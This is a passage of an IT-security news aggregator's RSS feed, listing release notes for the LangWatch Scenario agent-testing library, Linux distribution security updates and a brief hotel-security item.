<li>Native hooks: bound relay lifetimes so abandoned native hook connections cannot linger indefinitely. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618041701" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91550" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91550/hovercard" href="https://github.com/openclaw/openclaw/pull/91550">#91550</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[python: v0.7.28]]></title>
<description><![CDATA[0.7.28 (2026-06-05)
Features

#318: add context param to JudgmentRequest for extra judge evaluation input (#554) (1947824)

Bug Fixes

#191: rename --debug to --scenario-debug in pytest plugin to avoid file-overwrite (095360e), closes #191
#191: rename --debug to --scenario-debug in pytest plugin...]]></description>
<link>https://tsecurity.de/de/3581372/it-security-tools/python-v0728/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581372/it-security-tools/python-v0728/</guid>
<pubDate>Mon, 08 Jun 2026 14:04:35 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/python/v0.7.27...python/v0.7.28">0.7.28</a> (2026-06-05)</h2>
<h3>Features</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207387710" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/318" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/318/hovercard" href="https://github.com/langwatch/scenario/issues/318">#318</a>:</strong> add context param to JudgmentRequest for extra judge evaluation input (<a href="https://github.com/langwatch/scenario/issues/554" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/554/hovercard">#554</a>) (<a href="https://github.com/langwatch/scenario/commit/1947824f179da1176664a843039ba8bd64e7a5fe">1947824</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720481212" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/191" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/191/hovercard" href="https://github.com/langwatch/scenario/issues/191">#191</a>:</strong> rename --debug to --scenario-debug in pytest plugin to avoid file-overwrite (<a href="https://github.com/langwatch/scenario/commit/095360e68c96ef579de50c127a8112a3110c55ff">095360e</a>), closes <a href="https://github.com/langwatch/scenario/issues/191" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/191/hovercard">#191</a></li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3720481212" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/191" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/191/hovercard" href="https://github.com/langwatch/scenario/issues/191">#191</a>:</strong> rename --debug to --scenario-debug in pytest plugin to prevent file overwrite (<a href="https://github.com/langwatch/scenario/issues/551" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/551/hovercard">#551</a>) (<a href="https://github.com/langwatch/scenario/commit/095360e68c96ef579de50c127a8112a3110c55ff">095360e</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420744661" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/454" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/454/hovercard" href="https://github.com/langwatch/scenario/issues/454">#454</a>:</strong> add liveness check + auto-restart to requires_pipecat_bot fixture (<a href="https://github.com/langwatch/scenario/issues/557" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/557/hovercard">#557</a>) (<a href="https://github.com/langwatch/scenario/commit/a9bb3f9cbeea1b8b87e015b2039dc310d9151c13">a9bb3f9</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420744661" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/454" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/454/hovercard" href="https://github.com/langwatch/scenario/issues/454">#454</a>:</strong> add liveness check and auto-restart to requires_pipecat_bot fixture (<a href="https://github.com/langwatch/scenario/commit/a9bb3f9cbeea1b8b87e015b2039dc310d9151c13">a9bb3f9</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488204056" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/500" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/500/hovercard" href="https://github.com/langwatch/scenario/issues/500">#500</a>:</strong> include exception type name when str(e) is empty in _call_agent re-raise (<a href="https://github.com/langwatch/scenario/issues/547" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/547/hovercard">#547</a>) (<a href="https://github.com/langwatch/scenario/commit/acfbda9c7d1f8e82678e868f20d9f0c2c4acbe25">acfbda9</a>), closes <a href="https://github.com/langwatch/scenario/issues/500" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/500/hovercard">#500</a></li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488209120" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/501" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/501/hovercard" href="https://github.com/langwatch/scenario/issues/501">#501</a>:</strong> set PYTHONUNBUFFERED=1 on pipecat bot subprocess to prevent log loss on crash (<a href="https://github.com/langwatch/scenario/issues/548" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/548/hovercard">#548</a>) (<a href="https://github.com/langwatch/scenario/commit/a56720d655cb7617a7c922a213e3fb74a57d158d">a56720d</a>), closes <a href="https://github.com/langwatch/scenario/issues/501" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/501/hovercard">#501</a></li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488213392" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/502" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/502/hovercard" href="https://github.com/langwatch/scenario/issues/502">#502</a>/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486916241" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/493" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/493/hovercard" href="https://github.com/langwatch/scenario/issues/493">#493</a>:</strong> raise VoiceAgentAdapter.response_timeout default to 60s (<a href="https://github.com/langwatch/scenario/commit/38172ee2e42dfe4f2db486683762287cbc3ab424">38172ee</a>)</li>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488213392" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/502" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/502/hovercard" href="https://github.com/langwatch/scenario/issues/502">#502</a>:</strong> raise VoiceAgentAdapter.response_timeout default from 30s to 60s (<a href="https://github.com/langwatch/scenario/issues/558" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/558/hovercard">#558</a>) (<a href="https://github.com/langwatch/scenario/commit/38172ee2e42dfe4f2db486683762287cbc3ab424">38172ee</a>)</li>
<li><strong>executor:</strong> suppress pydantic warnings during agent await, not just creation (<a href="https://github.com/langwatch/scenario/issues/541" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/541/hovercard">#541</a>) (<a href="https://github.com/langwatch/scenario/commit/9e55f7a0da0c0260df34d91465c702eef924c25e">9e55f7a</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269762879" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/350" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/350/hovercard" href="https://github.com/langwatch/scenario/issues/350">#350</a>:</strong> post-merge cleanup — capability AC, disconnect logging, doc drift, e2e wedge (<a href="https://github.com/langwatch/scenario/issues/492" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/492/hovercard">#492</a>) (<a href="https://github.com/langwatch/scenario/commit/71dd5eda08516c3e0fe1927043ac33f4a4762bf5">71dd5ed</a>)</li>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572952837" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/602" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/602/hovercard" href="https://github.com/langwatch/scenario/issues/602">#602</a>:</strong> migrate OpenAIRealtimeAgentAdapter to GA Realtime wire protocol (<a href="https://github.com/langwatch/scenario/issues/604" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/604/hovercard">#604</a>) (<a href="https://github.com/langwatch/scenario/commit/3765f3c5a6eeeee5c7598c1c90bdd35233a2ae4d">3765f3c</a>)</li>
<li><strong>voice:</strong> tolerate empty-content user/system turns in snapshot emitter (<a href="https://github.com/langwatch/scenario/issues/600" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/600/hovercard">#600</a>) (<a href="https://github.com/langwatch/scenario/issues/603" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/603/hovercard">#603</a>) (<a href="https://github.com/langwatch/scenario/commit/0f5555d879a13f46e0c72f28d5754e6fe0c1dffc">0f5555d</a>)</li>
</ul>
<h3>Miscellaneous</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485410921" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/489" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/489/hovercard" href="https://github.com/langwatch/scenario/issues/489">#489</a>:</strong> drop stale Python 3.8/3.9 classifiers from pyproject.toml (<a href="https://github.com/langwatch/scenario/issues/555" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/555/hovercard">#555</a>) (<a href="https://github.com/langwatch/scenario/commit/eb334526cdd5cf9db0c4c00b0c84552e45c33ab5">eb33452</a>)</li>
<li>main-side cleanup — docs + spec + python/TS parity (<a href="https://github.com/langwatch/scenario/issues/586" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/586/hovercard">#586</a>) (<a href="https://github.com/langwatch/scenario/commit/371f94cd20998004398fa19d663254cb9aace8d8">371f94c</a>)</li>
<li>scrub vestigial AC-reference tags from code + specs (<a href="https://github.com/langwatch/scenario/issues/594" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/594/hovercard">#594</a>) (<a href="https://github.com/langwatch/scenario/commit/f8c56219022ef2e58da004206783066454bbbcdf">f8c5621</a>)</li>
<li>scrub vestigial AC-reference tags, keep descriptions (<a href="https://github.com/langwatch/scenario/commit/f8c56219022ef2e58da004206783066454bbbcdf">f8c5621</a>)</li>
</ul>
<h3>Documentation</h3>
<ul>
<li><strong>voice/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4590127867" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/606" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/606/hovercard" href="https://github.com/langwatch/scenario/issues/606">#606</a>:</strong> document STT/TTS model choices as deliberate current-gen (<a href="https://github.com/langwatch/scenario/issues/610" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/610/hovercard">#610</a>) (<a href="https://github.com/langwatch/scenario/commit/6211df3c1386520a59de165f5a7ccd57d6a8eaf2">6211df3</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel), Debian (dovecot, exim4, frr, and haveged), Fedora (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl,...]]></description>
<link>https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 05 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel), <b>Debian</b> (dovecot, exim4, frr, and haveged), <b>Fedora</b> (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl, python-starlette, rubygem-yard, rust-sequoia-cert-store, rust-sequoia-chameleon-gnupg, rust-sequoia-octopus-librnp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-wot, samba, and transmission), <b>Red Hat</b> (image-builder), <b>Slackware</b> (dnsmasq and libinput), <b>SUSE</b> (evince, glibc, google-guest-agent, hplip, ignition, LibVNCServer, libzypp, libsolv, python-Pillow, salt, thunderbird, and vim), and <b>Ubuntu</b> (apache2, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-5.15, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15,
 linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg,
 linux-kvm, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15,
 linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-azure, linux-azure-5.4,
 linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4,
 linux-gcp-fips, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4,
 linux-xilinx-zynqmp, linux, linux-azure, linux-azure-4.15, linux-azure-fips, linux-fips,
 linux-gcp-4.15, linux-gcp-fips, linux-kvm, linux-oracle, linux-aws-5.4, linux-hwe-5.4, linux-azure-fips, linux-fips, linux-raspi, linux-raspi-5.4, nano, postfix, robocode, tomcat6, tomcat7, and yard).]]></content:encoded>
</item>
<item>
<title><![CDATA[How Hotels Can Stay on Top of Security During Travel Season]]></title>
<description><![CDATA[The security teams for hotels and other lodging accommodations often have less bandwidth during heightened traveling periods. Effective visitor management systems can support them.]]></description>
<link>https://tsecurity.de/de/3574890/it-security-nachrichten/how-hotels-can-stay-on-top-of-security-during-travel-season/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574890/it-security-nachrichten/how-hotels-can-stay-on-top-of-security-during-travel-season/</guid>
<pubDate>Fri, 05 Jun 2026 11:23:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The security teams for hotels and other lodging accommodations often have less bandwidth during heightened traveling periods. Effective visitor management systems can support them. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[javascript: v0.4.12]]></title>
<description><![CDATA[0.4.12 (2026-06-04)
Features

#318: add context param to JudgmentRequest for extra judge evaluation input (#554) (1947824)
add GOAT strategy with dynamic technique selection for RedTeamAgent (#346) (2896c97)
ci/#364: add pr-auto-approve.yml as passive observer (PR #1 of 4) (#485) (4d84597)
red-te...]]></description>
<link>https://tsecurity.de/de/3573199/it-security-tools/javascript-v0412/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573199/it-security-tools/javascript-v0412/</guid>
<pubDate>Thu, 04 Jun 2026 18:03:52 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/javascript/v0.4.11...javascript/v0.4.12">0.4.12</a> (2026-06-04)</h2>
<h3>Features</h3>
<ul>
<li><strong><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207387710" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/318" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/318/hovercard" href="https://github.com/langwatch/scenario/issues/318">#318</a>:</strong> add context param to JudgmentRequest for extra judge evaluation input (<a href="https://github.com/langwatch/scenario/issues/554" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/554/hovercard">#554</a>) (<a href="https://github.com/langwatch/scenario/commit/1947824f179da1176664a843039ba8bd64e7a5fe">1947824</a>)</li>
<li>add GOAT strategy with dynamic technique selection for RedTeamAgent (<a href="https://github.com/langwatch/scenario/issues/346" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/346/hovercard">#346</a>) (<a href="https://github.com/langwatch/scenario/commit/2896c97e9a534a9ff1817904053a6af4f1ad06a4">2896c97</a>)</li>
<li><strong>ci/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276120003" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/364" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/364/hovercard" href="https://github.com/langwatch/scenario/issues/364">#364</a>:</strong> add pr-auto-approve.yml as passive observer (PR <a href="https://github.com/langwatch/scenario/issues/1" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/1/hovercard">#1</a> of 4) (<a href="https://github.com/langwatch/scenario/issues/485" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/485/hovercard">#485</a>) (<a href="https://github.com/langwatch/scenario/commit/4d8459710e566ac90ad731164a4506f6d81365eb">4d84597</a>)</li>
<li><strong>red-team:</strong> zero-friction report dashboard — auto-save + <code>scenario redteam-report</code> CLI (<a href="https://github.com/langwatch/scenario/commit/2896c97e9a534a9ff1817904053a6af4f1ad06a4">2896c97</a>)</li>
<li><strong>test/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495811003" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/516" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/516/hovercard" href="https://github.com/langwatch/scenario/issues/516">#516</a>:</strong> bind PR <a href="https://github.com/langwatch/scenario/issues/511" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/511/hovercard">#511</a> voice scenarios via vitest-cucumber (retrofit PR-A) (<a href="https://github.com/langwatch/scenario/issues/517" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/517/hovercard">#517</a>) (<a href="https://github.com/langwatch/scenario/commit/c247f42d4f8a1bfe5d4f4e86a55bd0ba32d4d650">c247f42</a>)</li>
<li><strong>typescript-sdk/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295246091" data-permission-text="Title is private" data-url="https://github.com/langwatch/scenario/issues/372" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/372/hovercard" href="https://github.com/langwatch/scenario/issues/372">#372</a>:</strong> voice agent contract surface (types only, PR1 of N) (<a href="https://github.com/langwatch/scenario/issues/511" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/511/hovercard">#511</a>) (<a href="https://github.com/langwatch/scenario/commit/9216d35071bba29ba065f4b188d7c8199c34777f">9216d35</a>)</li>
<li><strong>typescript-sdk:</strong> voice agent testing — consolidated clean stack (<a href="https://github.com/langwatch/scenario/issues/561" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/561/hovercard">#561</a>) (<a href="https://github.com/langwatch/scenario/commit/5847c4b40f76edefeca810ba40708db281b70821">5847c4b</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>deps:</strong> bump fast-uri to &gt;=3.1.2 for high severity CVEs (<a href="https://github.com/langwatch/scenario/issues/450" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/450/hovercard">#450</a>) (<a href="https://github.com/langwatch/scenario/commit/474ab6503a044d4c80f30dd6bdf712988becd636">474ab65</a>)</li>
<li><strong>deps:</strong> bump fast-uri to &gt;=3.1.2 to resolve high severity vulnerabilities (<a href="https://github.com/langwatch/scenario/commit/474ab6503a044d4c80f30dd6bdf712988becd636">474ab65</a>)</li>
<li><strong>deps:</strong> bump liquidjs override to &gt;=10.26.0 to close RCE/ReDoS alerts (<a href="https://github.com/langwatch/scenario/issues/591" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/591/hovercard">#591</a>) (<a href="https://github.com/langwatch/scenario/commit/daaf9ccfc4f89609518094a9a390eaaa89972fc3">daaf9cc</a>)</li>
<li><strong>deps:</strong> bump protobufjs to &gt;=7.5.6/&gt;=8.0.2 for high severity CVEs (<a href="https://github.com/langwatch/scenario/issues/463" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/463/hovercard">#463</a>) (<a href="https://github.com/langwatch/scenario/commit/f008161c8f45192a0290f0ebb884cc830de855bd">f008161</a>)</li>
<li><strong>deps:</strong> bump protobufjs to &gt;=8.0.2 for 4 high severity CVEs (<a href="https://github.com/langwatch/scenario/issues/462" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/462/hovercard">#462</a>) (<a href="https://github.com/langwatch/scenario/commit/e2c04991e352a777a1adc9e7719c6b69ceab682b">e2c0499</a>)</li>
<li><strong>deps:</strong> override hono to &gt;=4.12.18 for JWT NumericDate validation CVE (<a href="https://github.com/langwatch/scenario/issues/477" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/477/hovercard">#477</a>) (<a href="https://github.com/langwatch/scenario/commit/d81ff1ac031d3a4b62cfc28d5acd7e265cde4395">d81ff1a</a>)</li>
<li><strong>deps:</strong> override langsmith to &gt;=0.6.0 for CVE fix (<a href="https://github.com/langwatch/scenario/issues/471" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/471/hovercard">#471</a>) (<a href="https://github.com/langwatch/scenario/commit/4e5237ef3b966e9341ffe635454b938adea7e3ab">4e5237e</a>)</li>
<li><strong>deps:</strong> override langsmith to &gt;=0.6.0 for prompt deserialization CVEs (<a href="https://github.com/langwatch/scenario/commit/4e5237ef3b966e9341ffe635454b938adea7e3ab">4e5237e</a>)</li>
<li><strong>deps:</strong> override minimatch to &gt;=9.0.6 (<a title="CVE-2026-26996" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-3ppc-4f35-3m26/hovercard" href="https://github.com/advisories/GHSA-3ppc-4f35-3m26">CVE-2026-26996</a>) (<a href="https://github.com/langwatch/scenario/issues/395" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/395/hovercard">#395</a>) (<a href="https://github.com/langwatch/scenario/commit/ceb0b59e6a96fe27adf865f03aa1de8a9ea03357">ceb0b59</a>)</li>
<li><strong>deps:</strong> override qs to &gt;=6.14.2 for arrayLimit bypass DoS CVE (<a href="https://github.com/langwatch/scenario/issues/482" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/482/hovercard">#482</a>) (<a href="https://github.com/langwatch/scenario/commit/51a2b6daaf5c243154c3c61b8ffeaafd368d5628">51a2b6d</a>)</li>
<li><strong>deps:</strong> resolve 4 high-severity Dependabot security alerts (<a href="https://github.com/langwatch/scenario/issues/393" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/393/hovercard">#393</a>) (<a href="https://github.com/langwatch/scenario/commit/97f257ddc30a6bd7a9cca65e2e62e0ed0c688085">97f257d</a>)</li>
<li><strong>examples:</strong> stabilize custom LLM judge criteria matching (<a href="https://github.com/langwatch/scenario/issues/396" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/396/hovercard">#396</a>) (<a href="https://github.com/langwatch/scenario/commit/f4b536cf12a6d525b487c672f9451390e13957c7">f4b536c</a>)</li>
<li><strong>examples:</strong> use positional index matching in custom judge examples (<a href="https://github.com/langwatch/scenario/commit/f4b536cf12a6d525b487c672f9451390e13957c7">f4b536c</a>)</li>
<li><strong>judge:</strong> harden forceVerdict so discovery tools cannot leak (JS + Python) (<a href="https://github.com/langwatch/scenario/issues/377" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/377/hovercard">#377</a>) (<a href="https://github.com/langwatch/scenario/commit/0e2859f5ec1c171fa3d3d6f89b7d59555be6b95b">0e2859f</a>)</li>
<li><strong>red-team:</strong> annotate H_attacker when post-hoc injection fires (<a href="https://github.com/langwatch/scenario/issues/326" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/326/hovercard">#326</a>, <a href="https://github.com/langwatch/scenario/issues/334" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/334/hovercard">#334</a>) (<a href="https://github.com/langwatch/scenario/commit/2896c97e9a534a9ff1817904053a6af4f1ad06a4">2896c97</a>)</li>
<li><strong>security:</strong> bump liquidjs override to fix memoryLimit bypass, memory amplification, and DoS CVEs (<a href="https://github.com/langwatch/scenario/commit/25ba99ddf5bcfdc903ef59dd59e1606d8417f20c">25ba99d</a>)</li>
<li><strong>security:</strong> bump liquidjs to fix 4 additional high-severity CVEs (<a href="https://github.com/langwatch/scenario/issues/412" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/412/hovercard">#412</a>) (<a href="https://github.com/langwatch/scenario/commit/25ba99ddf5bcfdc903ef59dd59e1606d8417f20c">25ba99d</a>)</li>
<li><strong>security:</strong> delete orphaned vitest lockfile recreated during rebase (<a href="https://github.com/langwatch/scenario/commit/ea8a19cfdd1ff02ae3c9f7839d17ad5bf9346a5d">ea8a19c</a>)</li>
<li><strong>security:</strong> delete orphaned vitest lockfile to fix 8 Dependabot alerts (<a href="https://github.com/langwatch/scenario/issues/426" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/426/hovercard">#426</a>) (<a href="https://github.com/langwatch/scenario/commit/ea8a19cfdd1ff02ae3c9f7839d17ad5bf9346a5d">ea8a19c</a>)</li>
<li><strong>security:</strong> patch @modelcontextprotocol/sdk ReDoS, DNS rebinding, and data leak (<a href="https://github.com/langwatch/scenario/issues/410" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/410/hovercard">#410</a>) (<a href="https://github.com/langwatch/scenario/commit/b9930668175f8adbeb0941d721fa45b171c24810">b993066</a>)</li>
<li><strong>security:</strong> patch @modelcontextprotocol/sdk ReDoS, DNS rebinding, and data leak CVEs (<a href="https://github.com/langwatch/scenario/commit/b9930668175f8adbeb0941d721fa45b171c24810">b993066</a>)</li>
<li><strong>security:</strong> patch critical CVEs in protobufjs and handlebars (<a href="https://github.com/langwatch/scenario/issues/390" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/390/hovercard">#390</a>) (<a href="https://github.com/langwatch/scenario/commit/de89d5017cf27dd3c060bdafe920ed0168eff831">de89d50</a>)</li>
<li><strong>security:</strong> patch critical vulnerabilities in protobufjs and handlebars (<a href="https://github.com/langwatch/scenario/commit/de89d5017cf27dd3c060bdafe920ed0168eff831">de89d50</a>)</li>
<li><strong>security:</strong> patch <a title="CVE-2026-27903" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-7r86-cg39-jmmj/hovercard" href="https://github.com/advisories/GHSA-7r86-cg39-jmmj">CVE-2026-27903</a> in minimatch (<a href="https://github.com/langwatch/scenario/issues/398" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/398/hovercard">#398</a>) (<a href="https://github.com/langwatch/scenario/commit/b61cc6005645b7703788c02c6cb4d134559e339b">b61cc60</a>)</li>
<li><strong>security:</strong> patch flatted prototype pollution via parse() (<a href="https://github.com/langwatch/scenario/issues/421" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/421/hovercard">#421</a>) (<a href="https://github.com/langwatch/scenario/commit/3a20e6c57bb81583144cb643d3fcac390f66af3b">3a20e6c</a>)</li>
<li><strong>security:</strong> patch langchain serialization injection vulnerability (<a href="https://github.com/langwatch/scenario/issues/420" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/420/hovercard">#420</a>) (<a href="https://github.com/langwatch/scenario/commit/89dd0947dd660bb8aefe243c803841b65cbb67a1">89dd094</a>)</li>
<li><strong>security:</strong> patch path-to-regexp DoS in openai-realtime-demo (<a href="https://github.com/langwatch/scenario/commit/c6e55b06ba4bcdfa7640fffae9f086d3a871245c">c6e55b0</a>)</li>
<li><strong>security:</strong> patch path-to-regexp DoS in openai-realtime-demo (<a title="CVE-2026-4926" data-hovercard-type="advisory" data-hovercard-url="/advisories/GHSA-j3q9-mxjg-w52f/hovercard" href="https://github.com/advisories/GHSA-j3q9-mxjg-w52f">CVE-2026-4926</a>) (<a href="https://github.com/langwatch/scenario/issues/428" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/428/hovercard">#428</a>) (<a href="https://github.com/langwatch/scenario/commit/c6e55b06ba4bcdfa7640fffae9f086d3a871245c">c6e55b0</a>)</li>
<li><strong>security:</strong> patch path-to-regexp DoS via sequential optional groups (<a href="https://github.com/langwatch/scenario/issues/416" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/416/hovercard">#416</a>) (<a href="https://github.com/langwatch/scenario/commit/752539a738993f3b03085cda54b04792a036f17d">752539a</a>)</li>
<li><strong>security:</strong> patch rollup arbitrary file write via path traversal (<a href="https://github.com/langwatch/scenario/issues/399" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/399/hovercard">#399</a>) (<a href="https://github.com/langwatch/scenario/commit/55a02598ad8d245dfac159357b17c8d89192b824">55a0259</a>)</li>
